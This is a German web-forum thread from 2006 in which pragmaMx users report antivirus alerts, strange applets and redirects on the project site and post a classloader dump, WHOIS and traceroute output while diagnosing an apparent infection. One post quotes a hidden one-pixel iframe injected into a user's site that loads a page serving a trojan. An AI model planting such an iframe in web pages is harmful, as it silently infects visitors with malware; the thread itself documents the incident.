. .
pragmaMx Support Forum 08 Januar 2009, 08:36:10 *
Willkommen Gast. Bitte einloggen oder registrieren.


Einloggen mit Benutzername und Passwort
News:
Brauchen Sie Hilfe? Bitte nutzen Sie unsere Suchfunktion bevor Sie Beiträge oder Fragen ins Board schreiben! Viele Fragen wurden bereits gestellt und beantwortet. Danke!
 
Übersicht Hilfe Forenregeln / Boardrules
 
Suche
Seiten: [1] 2  Alle   Nach unten
Drucken
Autor Thema: pragmaseite mit trojaner??  (Gelesen 7324 mal)
0 Mitglieder und 1 Gast betrachten dieses Thema.
maverik
Gast
« am: 21 Dezember 2006, 09:16:49 »

hallo und guten morgen,

ich hatte gerade eine lustige meldung meines antivirenprogrammes als ich pragma öffnete. Diese meldung bekam ich vor wochen schon einmal. ich mache mir da keine großartigen gedanken drum und schiebe es mal auf die übernervosität meines nod32.
trotzdem möchte ich es euch einmal zeigen.

so long maverik

[gelöscht durch Administrator]
Gespeichert
Metal-Overdrive
weiss was
***
Offline Offline

Geschlecht: Männlich
Beiträge: 237


WWW
« Antworten #1 am: 21 Dezember 2006, 09:57:10 »

So eine ähnliche Meldung hat mir Kaspersky vor ein paar Tagen auch rausgehauen.
Gespeichert

CMS-Version:  pragmaMx 0.1.10, 1.30.2.13/2008-02-02
Serverdaten:  MySql: 5.0.45 - PHP: 5.2.6 auf Apache-Server - Gehostet @ all-inkl.com
Projekt:          wiesenfete.de
smartmusic
Inventar
*******
Offline Offline

Geschlecht: Männlich
Beiträge: 1.269


WWW
« Antworten #2 am: 21 Dezember 2006, 10:00:07 »

ja bekomme diese meldung auch, und die startseite springt nachdem sie vollständig geladen ist automatisch nach unten.
Gespeichert
jubilee
Gast
« Antworten #3 am: 21 Dezember 2006, 11:24:06 »


Zitat
ja bekomme diese meldung auch, und die startseite springt nachdem sie vollständig geladen ist automatisch nach unten

Tatsächlich wird da irgendetwas geladen.
Muss mal nachsehen woher das kommt. Scheint jedenfalls nicht von dieser Seite zu kommen.
Evt. von einem verlinkten Teil oder Script

Zitat
Dump classloader list ...
    codebase=http://65.254.37.58/manual/mod/s/, key=http://65.254.37.58/manual/mod/s/,crtdcghcn.jar, zombie=true, cache=true, refcount=0, info=sun.plugin.ClassLoaderInfo@12cc95d

Zitat
Search results for: 65.254.37.58


OrgName:    Global Net Access, LLC
OrgID:      GNAL-2
Address:    55 Marietta St, NW
Address:    Suite 1720
City:       Atlanta
StateProv:  GA
PostalCode: 30303
Country:    US

ReferralServer: rwhois://rwhois.gnax.net:4321

NetRange:   65.254.32.0 - 65.254.63.255
CIDR:       65.254.32.0/19
NetName:    GNAXNET
NetHandle:  NET-65-254-32-0-1
Parent:     NET-65-0-0-0-0
NetType:    Direct Allocation
NameServer: DNS1.GNAX.NET
NameServer: DNS2.GNAX.NET
Comment:   
RegDate:    2003-12-29
Updated:    2004-03-31

OrgAbuseHandle: ABUSE745-ARIN
OrgAbuseName:   Abuse
OrgAbusePhone:  +1-404-230-9150
OrgAbuseEmail:  abuse@gnax.net

OrgTechHandle: ENGIN7-ARIN
OrgTechName:   Engineering
OrgTechPhone:  +1-404-230-9150
OrgTechEmail:  engineering@gnax.net
# ARIN WHOIS database, last updated 2006-12-20 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.
Gespeichert
maverik
Gast
« Antworten #4 am: 21 Dezember 2006, 11:32:19 »

na dann scheint mein nod32 doch keine para´s zu haben, wenn da wirklich was im busch ist

Zitat
  3    40 ms    40 ms    39 ms  217.0.73.186
  4    46 ms    51 ms    52 ms  f-eb5.F.DE.net.DTAG.DE [62.154.17.62]
  5    46 ms    46 ms    47 ms  62.156.139.10
  6    47 ms    46 ms    46 ms  ffm-bb1-link.telia.net [80.91.249.138]
  7    64 ms    57 ms    64 ms  ldn-bb2-link.telia.net [80.91.249.12]
  8   132 ms    64 ms   132 ms  nyk-bb2-pos7-0-0.telia.net [213.248.65.210]
  9   144 ms   141 ms   144 ms  ash-bb1-link.telia.net [80.91.250.17]
 10   140 ms   151 ms   150 ms  atl-bb1-link.telia.net [213.248.80.142]
 11   152 ms   152 ms   152 ms  atl-bb1-link.telia.net [213.248.80.142]
 12   154 ms   153 ms   274 ms  globalnet-103907-atl-bb1.c.telia.net [213.248.90.54]
 13   152 ms   152 ms   155 ms  209.51.131.29
 14   154 ms   154 ms   155 ms  209.51.149.109
 15   152 ms   155 ms   152 ms  thebesthomeloans.net [65.254.37.58]

Ablaufverfolgung beendet.


so long
Gespeichert
jubilee
Gast
« Antworten #5 am: 21 Dezember 2006, 11:43:16 »

Hmmm ...
Ich kanns aber nicht mehr provozieren ?!
Habt ihr den Fehler jetzt noch ?

Gespeichert
maverik
Gast
« Antworten #6 am: 21 Dezember 2006, 12:12:33 »

hiho

das ist insgesamt erst 2 mal bei mir aufgetauscht, so im letzten halben jahr, lässt sich auch leider nicht reproduzieren

mal abwarten ob noch mehr ähnliches verhalten haben

so long maverik
Gespeichert
FrankySZ
Inventar
*******
Offline Offline

Geschlecht: Männlich
Beiträge: 1.463


WWW
« Antworten #7 am: 21 Dezember 2006, 12:46:19 »


Hi @ll,

hab zwar keine Meldung von meinem Kaspersky bekommen, aber dafuer meckert mein NoScript-Addon fuer FF seit ca. 2tagen rum ... da ich das script nicht erlaubt hab, daher wohl auch keine Meldung von Kaspersky Wink

btw wenn man die 65.254.37.58 im Browser aufruft kommt man zu ner Site die einem sagt dass man cpanel installiert hat ....
Gespeichert

greets Franky
smartmusic
Inventar
*******
Offline Offline

Geschlecht: Männlich
Beiträge: 1.269


WWW
« Antworten #8 am: 21 Dezember 2006, 13:11:24 »

also nun bekomme ich immer hinweise von firefox bezüglich sexseiten und spuren hinterlassen

und es lädt irgendwas nach

de.drivecleaner.com

yahoo.com
Gespeichert
Oscar175
weiss was
***
Offline Offline

Geschlecht: Männlich
Beiträge: 182



WWW
« Antworten #9 am: 21 Dezember 2006, 13:30:30 »

Hallo ich hatte eben gerade "Applet BaaaaBaa started"
Gespeichert

maverik
Gast
« Antworten #10 am: 21 Dezember 2006, 13:38:27 »

ok wo wir grad mal bei den ungereimtheiten sind, seamonkey liefert das

was das denn fürn cookie gruebel

[gelöscht durch Administrator]
Gespeichert
maverik
Gast
« Antworten #11 am: 21 Dezember 2006, 13:52:58 »

ie7

[gelöscht durch Administrator]
Gespeichert
spike
weiss mehr
****
Offline Offline

Beiträge: 402



WWW
« Antworten #12 am: 21 Dezember 2006, 14:05:13 »

das mit dem applet baabaaa startet hatte ich auch gerade...
Gespeichert
jubilee
Gast
« Antworten #13 am: 21 Dezember 2006, 14:11:25 »

Zitat
applet baabaaa
Jo, auch verseucht.
Gespeichert
cihan
Spezialist
*****
Offline Offline

Beiträge: 539



WWW
« Antworten #14 am: 21 Dezember 2006, 14:12:36 »

gestern habe ich auch eine warnung von nav bekommen... in dem moment war ich auf pragmam... habe gar nicht daran gedacht, dass das von pragmam kommt... danach habe ich eine fehlermeldung bekommen, nachdem die seite erstmal sehr langsam wurde... gerade ist die seite wieder sehr langsam geworden, anschliessend wieder die fehlermeldung... nach dem ausblenden des fehlers dauert ein wenig, bis die seite wieder normal läuft.

[gelöscht durch Administrator]
Gespeichert
Metal-Overdrive
weiss was
***
Offline Offline

Geschlecht: Männlich
Beiträge: 237


WWW
« Antworten #15 am: 21 Dezember 2006, 14:19:31 »

Ich hatte das Problem mit dem IE7. Wollte ein ActiveX Steuerelement installieren. Bisher aber nur 1x in den letzten 3 Tagen aufgetreten. Welche Meldung Kaspersky genau rausgegeben hat weiß ich nicht mehr.
Gespeichert

CMS-Version:  pragmaMx 0.1.10, 1.30.2.13/2008-02-02
Serverdaten:  MySql: 5.0.45 - PHP: 5.2.6 auf Apache-Server - Gehostet @ all-inkl.com
Projekt:          wiesenfete.de
GerhardSt
Beta-Tester
****
Offline Offline

Geschlecht: Männlich
Beiträge: 854



« Antworten #16 am: 21 Dezember 2006, 18:52:33 »

Hallo, bei mir wollte der IE7 gestern auch ein ActiveX Steuerelement installieren um diese Seite richtig darzustellen. Ich schaue diese Seite auf drei verschiedenen Rechnern an, nur diese Meldung bekam ich nur gestern auf einen, obwohl  auf allen XP mit IE7 läuft.
Gespeichert

CMS-Version: pragmaMx 0.1.11, 1.30.2.19/2008-07-19
PHP-Version: 5.2.8
MySQL-Version: 4.1.22-standard-log
Server-Version: Apache/2.2.3 (Linux/SUSE)

IE 7 oder Firefox
tuningcar
weiss mehr
****
Offline Offline

Geschlecht: Männlich
Beiträge: 363



WWW
« Antworten #17 am: 21 Dezember 2006, 20:01:42 »

Das selbe Problem hatte ich vor drei Wochen auch auf meiner Tuning Seite  puzzled

Durch irgendein Sicherheitsloch hatt so ein w... mir in vielen index.html Seiten folgenden Iframe eingefügt :

<iframe src=http://x-road.co.kr/rich/out.php width=1 height=1></iframe>

Durch den Aufruf dieser Seite in dem Iframe kommt mann zu den Troyaner  Evil

Gespeichert

NeMeSiSX2LC
Inventar
*******
Offline Offline

Geschlecht: Männlich
Beiträge: 3.605


WWW
« Antworten #18 am: 21 Dezember 2006, 23:03:21 »

Hatte ich noch nicht... Aberwird bald auch der Fall sein... Weil es stehen sehr komische Referrere drin....
Gespeichert

CMS-Version: pragmaMx 0.1.8, 1.20.4.5/2006-03-10     
PHP-Version: 5.1.2
MySQL-Version: 5.0.15-max-log
Server-Version: Apache/2.0.55
phpMyAdmin-Version: 2.7.0-pl1
doggie
öfter hier
**
Offline Offline

Beiträge: 44



« Antworten #19 am: 21 Dezember 2006, 23:31:30 »

da krieg man ja die Panik  Evil

gerade eben hat sich der firefox verabschiedet und eine sexseite hat sich geöffnet.
Gespeichert

Seiten: [1] 2  Alle   Nach oben
Drucken
 
Gehe zu:  

Powered by SMF 1.1.7 | SMF © 2006-2008, Simple Machines LLC
design by hENNE, layout based on YAML